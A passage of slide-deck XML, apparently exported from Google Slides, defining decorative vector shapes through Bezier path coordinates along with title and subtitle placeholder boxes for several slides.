                    <a:lnTo>
                      <a:pt x="70816" y="0"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="72154" y="339"/>
                      <a:pt x="73376" y="669"/>
                      <a:pt x="74714" y="1115"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78399" y="2230"/>
                      <a:pt x="82297" y="3568"/>
                      <a:pt x="85420" y="5915"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87766" y="7699"/>
                      <a:pt x="89211" y="10036"/>
                      <a:pt x="90665" y="12489"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92226" y="15389"/>
                      <a:pt x="93225" y="19180"/>
                      <a:pt x="96571" y="20634"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100701" y="22419"/>
                      <a:pt x="105608" y="22080"/>
                      <a:pt x="109952" y="22749"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="110068" y="22749"/>
                      <a:pt x="110068" y="22865"/>
                      <a:pt x="109952" y="22865"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105715" y="22642"/>
                      <a:pt x="101147" y="23195"/>
                      <a:pt x="97017" y="21749"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94118" y="20857"/>
                      <a:pt x="92110" y="18734"/>
                      <a:pt x="90549" y="16174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="88988" y="13498"/>
                      <a:pt x="87543" y="10482"/>
                      <a:pt x="85312" y="8368"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82413" y="5692"/>
                      <a:pt x="78506" y="4237"/>
                      <a:pt x="74714" y="3122"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70254" y="1677"/>
                      <a:pt x="65686" y="785"/>
                      <a:pt x="611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0" name="Google Shape;2600;p75"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5713400" y="845125"/>
                <a:ext cx="1224000" cy="579875"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="23195" w="48960">
                    <a:moveTo>
                      <a:pt x="1" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="4577" y="785"/>
                      <a:pt x="9145" y="1677"/>
                      <a:pt x="13605" y="3122"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17397" y="4237"/>
                      <a:pt x="21304" y="5692"/>
                      <a:pt x="24203" y="8368"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26434" y="10482"/>
                      <a:pt x="27879" y="13498"/>
                      <a:pt x="29440" y="16174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="31001" y="18734"/>
                      <a:pt x="33009" y="20857"/>
                      <a:pt x="35908" y="21749"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40038" y="23195"/>
                      <a:pt x="44606" y="22642"/>
                      <a:pt x="48843" y="22865"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48959" y="22865"/>
                      <a:pt x="48959" y="22749"/>
                      <a:pt x="48843" y="22749"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44499" y="22080"/>
                      <a:pt x="39592" y="22419"/>
                      <a:pt x="35462" y="20634"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32116" y="19180"/>
                      <a:pt x="31117" y="15389"/>
                      <a:pt x="29556" y="12489"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28102" y="10036"/>
                      <a:pt x="26657" y="7699"/>
                      <a:pt x="24311" y="5915"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21188" y="3568"/>
                      <a:pt x="17290" y="2230"/>
                      <a:pt x="13605" y="1115"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12267" y="669"/>
                      <a:pt x="11045" y="339"/>
                      <a:pt x="97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1" name="Google Shape;2601;p75"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7018425" y="1440525"/>
                <a:ext cx="356550" cy="717800"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="28712" w="14262">
                    <a:moveTo>
                      <a:pt x="26" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="0"/>
                      <a:pt x="26" y="48"/>
                      <a:pt x="104" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="12"/>
                      <a:pt x="39" y="0"/>
                      <a:pt x="26" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="104" y="48"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="104" y="48"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="4225" y="2055"/>
                      <a:pt x="4118" y="6739"/>
                      <a:pt x="4671" y="10753"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5340" y="15330"/>
                      <a:pt x="7018" y="19790"/>
                      <a:pt x="9578" y="23689"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10916" y="25589"/>
                      <a:pt x="12477" y="27257"/>
                      <a:pt x="14261" y="28711"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="14261" y="26258"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="12477" y="24581"/>
                      <a:pt x="11032" y="22689"/>
                      <a:pt x="9801" y="20566"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7464" y="16668"/>
                      <a:pt x="6456" y="12091"/>
                      <a:pt x="5340" y="7631"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4564" y="4508"/>
                      <a:pt x="3333" y="1279"/>
                      <a:pt x="104" y="4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02" name="Google Shape;2602;p75"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="-335338" y="3242300"/>
              <a:ext cx="2223230" cy="1579186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75"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="0" y="4239925"/>
              <a:ext cx="2132607" cy="903576"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="6430" w="15176">
                  <a:moveTo>
                    <a:pt x="14851" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="13065" y="1"/>
                    <a:pt x="13747" y="3704"/>
                    <a:pt x="11309" y="3704"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10789" y="3704"/>
                    <a:pt x="10127" y="3536"/>
                    <a:pt x="9270" y="3128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8066" y="2566"/>
                    <a:pt x="6609" y="2262"/>
                    <a:pt x="5236" y="2262"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2446" y="2262"/>
                    <a:pt x="1" y="3518"/>
                    <a:pt x="724" y="6429"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="15175" y="6429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15175" y="37"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="15059" y="13"/>
                    <a:pt x="14951" y="1"/>
                    <a:pt x="14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04" name="Google Shape;2604;p75"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-1" y="2590808"/>
              <a:ext cx="3840097" cy="2558635"/>
              <a:chOff x="235225" y="2771600"/>
              <a:chExt cx="3133750" cy="2088000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2605" name="Google Shape;2605;p75"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2616250" y="4833875"/>
                <a:ext cx="390300" cy="25725"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="1029" w="15612">
                    <a:moveTo>
                      <a:pt x="7918" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="6022" y="0"/>
                      <a:pt x="4126" y="195"/>
                      <a:pt x="2230" y="583"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1445" y="699"/>
                      <a:pt x="776" y="922"/>
                      <a:pt x="0" y="1029"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="15612" y="1029"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="14943" y="806"/>
                      <a:pt x="14274" y="699"/>
                      <a:pt x="13605" y="583"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11709" y="195"/>
                      <a:pt x="9813" y="0"/>
                      <a:pt x="7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6" name="Google Shape;2606;p75"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="235225" y="3025200"/>
                <a:ext cx="1299375" cy="1834400"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="73376" w="51975">
                    <a:moveTo>
                      <a:pt x="116" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="116" y="73376"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51974" y="73376"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="50297" y="72930"/>
                      <a:pt x="48629" y="72376"/>
                      <a:pt x="47067" y="71814"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43945" y="70922"/>
                      <a:pt x="40823" y="69584"/>
                      <a:pt x="38592" y="67247"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="36469" y="64901"/>
                      <a:pt x="34462" y="62340"/>
                      <a:pt x="31679" y="60779"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28110" y="58879"/>
                      <a:pt x="24203" y="58772"/>
                      <a:pt x="20411" y="57987"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16843" y="57318"/>
                      <a:pt x="13498" y="56203"/>
                      <a:pt x="10598" y="53972"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4246" y="49066"/>
                      <a:pt x="1231" y="41706"/>
                      <a:pt x="562" y="33900"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="26094"/>
                      <a:pt x="2462" y="18511"/>
                      <a:pt x="2239" y="10705"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2239" y="7137"/>
                      <a:pt x="1677" y="3461"/>
                      <a:pt x="232" y="223"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="232" y="223"/>
                      <a:pt x="116" y="116"/>
                      <a:pt x="1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7" name="Google Shape;2607;p75"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="238125" y="2771600"/>
                <a:ext cx="3130850" cy="2088000"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="83520" w="125234">
                    <a:moveTo>
                      <a:pt x="0" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="6915"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1900" y="9591"/>
                      <a:pt x="3122" y="12713"/>
                      <a:pt x="3684" y="15943"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4684" y="22527"/>
                      <a:pt x="3345" y="28878"/>
                      <a:pt x="2569" y="35346"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1784" y="42483"/>
                      <a:pt x="2453" y="50066"/>
                      <a:pt x="5799" y="56534"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7583" y="59879"/>
                      <a:pt x="9929" y="62894"/>
                      <a:pt x="13275" y="64785"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16174" y="66463"/>
                      <a:pt x="19519" y="67239"/>
                      <a:pt x="22865" y="67801"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26433" y="68247"/>
                      <a:pt x="29886" y="68800"/>
                      <a:pt x="32901" y="70807"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35907" y="72814"/>
                      <a:pt x="38137" y="75830"/>
                      <a:pt x="41260" y="77721"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44828" y="79844"/>
                      <a:pt x="49182" y="80736"/>
                      <a:pt x="53080" y="81851"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="55203" y="82405"/>
                      <a:pt x="57434" y="82967"/>
                      <a:pt x="59548" y="83520"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="86311" y="83520"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="89880" y="82851"/>
                      <a:pt x="93341" y="81958"/>
                      <a:pt x="96909" y="81289"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="98997" y="80874"/>
                      <a:pt x="101118" y="80647"/>
                      <a:pt x="103238" y="80647"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105077" y="80647"/>
                      <a:pt x="106915" y="80818"/>
                      <a:pt x="108730" y="81182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="111183" y="81735"/>
                      <a:pt x="113413" y="82520"/>
                      <a:pt x="115751" y="83520"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="125234" y="83520"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="124342" y="82744"/>
                      <a:pt x="123449" y="82074"/>
                      <a:pt x="122557" y="81405"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115864" y="76771"/>
                      <a:pt x="107818" y="74901"/>
                      <a:pt x="99819" y="74901"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95685" y="74901"/>
                      <a:pt x="91564" y="75400"/>
                      <a:pt x="87649" y="76276"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83004" y="77261"/>
                      <a:pt x="78181" y="79000"/>
                      <a:pt x="73516" y="79000"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70791" y="79000"/>
                      <a:pt x="68120" y="78406"/>
                      <a:pt x="65570" y="76722"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="62563" y="74599"/>
                      <a:pt x="60556" y="71253"/>
                      <a:pt x="57880" y="68693"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54980" y="65901"/>
                      <a:pt x="51635" y="64232"/>
                      <a:pt x="47844" y="63447"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44235" y="62797"/>
                      <a:pt x="40508" y="62755"/>
                      <a:pt x="36769" y="62755"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="36218" y="62755"/>
                      <a:pt x="35666" y="62756"/>
                      <a:pt x="35115" y="62756"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29809" y="62756"/>
                      <a:pt x="24510" y="62672"/>
                      <a:pt x="19519" y="60887"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9367" y="57203"/>
                      <a:pt x="5915" y="47505"/>
                      <a:pt x="7253" y="36131"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8698" y="24311"/>
                      <a:pt x="11374" y="14498"/>
                      <a:pt x="3791" y="4568"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2676" y="3123"/>
                      <a:pt x="1338" y="15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8" name="Google Shape;2608;p75"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2395900" y="4787775"/>
                <a:ext cx="736000" cy="71825"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="2873" w="29440">
                    <a:moveTo>
                      <a:pt x="16927" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="14807" y="0"/>
                      <a:pt x="12686" y="227"/>
                      <a:pt x="10598" y="642"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7030" y="1311"/>
                      <a:pt x="3569" y="2204"/>
                      <a:pt x="0" y="2873"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="8814" y="2873"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9590" y="2766"/>
                      <a:pt x="10259" y="2543"/>
                      <a:pt x="11044" y="2427"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12940" y="2039"/>
                      <a:pt x="14836" y="1844"/>
                      <a:pt x="16732" y="1844"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18627" y="1844"/>
                      <a:pt x="20523" y="2039"/>
                      <a:pt x="22419" y="2427"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23088" y="2543"/>
                      <a:pt x="23757" y="2650"/>
                      <a:pt x="24426" y="2873"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="29440" y="2873"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="27102" y="1873"/>
                      <a:pt x="24872" y="1088"/>
                      <a:pt x="22419" y="535"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20604" y="171"/>
                      <a:pt x="18766" y="0"/>
                      <a:pt x="16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9" name="Google Shape;2609;p75"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="235225" y="2944450"/>
                <a:ext cx="1491600" cy="1915150"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="76606" w="59664">
                    <a:moveTo>
                      <a:pt x="116" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="116" y="3230"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="3346"/>
                      <a:pt x="232" y="3453"/>
                      <a:pt x="232" y="3453"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1677" y="6691"/>
                      <a:pt x="2239" y="10367"/>
                      <a:pt x="2239" y="13935"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2462" y="21741"/>
                      <a:pt x="0" y="29324"/>
                      <a:pt x="562" y="37130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1231" y="44936"/>
                      <a:pt x="4246" y="52296"/>
                      <a:pt x="10598" y="57202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13498" y="59433"/>
                      <a:pt x="16843" y="60548"/>
                      <a:pt x="20411" y="61217"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24203" y="62002"/>
                      <a:pt x="28110" y="62109"/>
                      <a:pt x="31679" y="64009"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34462" y="65570"/>
                      <a:pt x="36469" y="68131"/>
                      <a:pt x="38592" y="70477"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40823" y="72814"/>
                      <a:pt x="43945" y="74152"/>
                      <a:pt x="47067" y="75044"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48629" y="75606"/>
                      <a:pt x="50297" y="76160"/>
                      <a:pt x="51974" y="76606"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="59664" y="76606"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="57550" y="76053"/>
                      <a:pt x="55319" y="75491"/>
                      <a:pt x="53196" y="74937"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49298" y="73822"/>
                      <a:pt x="44944" y="72930"/>
                      <a:pt x="41376" y="70807"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38253" y="68916"/>
                      <a:pt x="36023" y="65900"/>
                      <a:pt x="33017" y="63893"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30002" y="61886"/>
                      <a:pt x="26549" y="61333"/>
                      <a:pt x="22981" y="60887"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19635" y="60325"/>
                      <a:pt x="16290" y="59549"/>
                      <a:pt x="13391" y="57871"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10045" y="55980"/>
                      <a:pt x="7699" y="52965"/>
                      <a:pt x="5915" y="49620"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2569" y="43152"/>
                      <a:pt x="1900" y="35569"/>
                      <a:pt x="2685" y="28432"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3461" y="21964"/>
                      <a:pt x="4800" y="15613"/>
                      <a:pt x="3800" y="9029"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3238" y="5799"/>
                      <a:pt x="2016" y="2677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610" name="Google Shape;2610;p75"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5158098" y="1231184"/>
            <a:ext cx="3985907" cy="3918269"/>
            <a:chOff x="2524675" y="238075"/>
            <a:chExt cx="1178600" cy="1158600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2611" name="Google Shape;2611;p75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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5" name="Google Shape;2665;p75"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-26" y="2571758"/>
            <a:ext cx="3840097" cy="2558635"/>
            <a:chOff x="235225" y="2771600"/>
            <a:chExt cx="3133750" cy="2088000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2666" name="Google Shape;2666;p75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75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75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75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75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1" name="Google Shape;2671;p75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672" name="Google Shape;2672;p75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75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75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75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75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7" name="Google Shape;267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3"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76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="715650" y="1814525"/>
            <a:ext cx="38496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0" name="Google Shape;2680;p76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713250" y="2335428"/>
            <a:ext cx="38520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681" name="Google Shape;2681;p76"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="13724" y="2571758"/>
            <a:ext cx="3840097" cy="2558635"/>
            <a:chOff x="235225" y="2771600"/>
            <a:chExt cx="3133750" cy="2088000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2682" name="Google Shape;2682;p76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76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76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76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76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7" name="Google Shape;2687;p76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2688" name="Google Shape;2688;p76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76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p76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76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76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3" name="Google Shape;2693;p76"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="39700" y="3880440"/>
            <a:ext cx="3277906" cy="1263054"/>
            <a:chOff x="1766763" y="-4125385"/>
            <a:chExt cx="3277907" cy="1263054"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2694" name="Google Shape;2694;p7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7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7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7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7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7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7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7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7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7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7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7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7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7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7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7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7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7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7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7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7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7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7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7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7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7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0" name="Google Shape;2720;p76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2721" name="Google Shape;2721;p7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7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7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7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7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7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7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7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7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7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7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7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7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7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7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7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7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7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7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7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7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p7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7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7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7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7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47" name="Google Shape;2747;p76"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="-5400000">
            <a:off x="6873527" y="1007415"/>
            <a:ext cx="3277906" cy="1263056"/>
            <a:chOff x="1766763" y="-4125385"/>
            <a:chExt cx="3277907" cy="1263054"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2748" name="Google Shape;2748;p7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7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7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7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7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7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7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7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7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7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7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7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7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7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7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7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7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7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6" name="Google Shape;2766;p7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7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7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7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7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7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7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7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74" name="Google Shape;277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77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4592325" y="1810512"/>
            <a:ext cx="38496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77" name="Google Shape;2777;p77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4589925" y="2333796"/>
            <a:ext cx="38520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78" name="Google Shape;2778;p77"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="5303899" y="2571758"/>
            <a:ext cx="3840097" cy="2558635"/>
            <a:chOff x="235225" y="2771600"/>
            <a:chExt cx="3133750" cy="2088000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2779" name="Google Shape;2779;p7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7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7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7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7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4" name="Google Shape;2784;p77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2785" name="Google Shape;2785;p7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7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7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7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7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0" name="Google Shape;2790;p77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2791" name="Google Shape;2791;p7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7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7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7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7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7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7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7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7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7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1" name="Google Shape;2801;p7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2" name="Google Shape;2802;p7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7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4" name="Google Shape;2804;p7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5" name="Google Shape;2805;p7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p7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p7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p7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p7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p7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7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p7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p7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7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p7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p7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7" name="Google Shape;2817;p77"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5866102" y="3880440"/>
            <a:ext cx="3277907" cy="1263054"/>
            <a:chOff x="1766763" y="-4125385"/>
            <a:chExt cx="3277907" cy="1263054"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2818" name="Google Shape;2818;p7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p7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7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p7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p7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p7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p7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p7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p7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p7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7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7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7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7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7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p7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p7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7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7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p7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p7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p7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p7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7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p7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p7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4" name="Google Shape;2844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78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7" name="Google Shape;2847;p78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8" name="Google Shape;2848;p78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9" name="Google Shape;2849;p78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0" name="Google Shape;2850;p78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="7242794" y="327957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Google Shape;2851;p78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="-13316" y="3126092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78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="-13308" y="4132062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3" name="Google Shape;2853;p78"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="10800000">
            <a:off x="5290591" y="0"/>
            <a:ext cx="3840097" cy="2558635"/>
            <a:chOff x="235225" y="2771600"/>
            <a:chExt cx="3133750" cy="2088000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
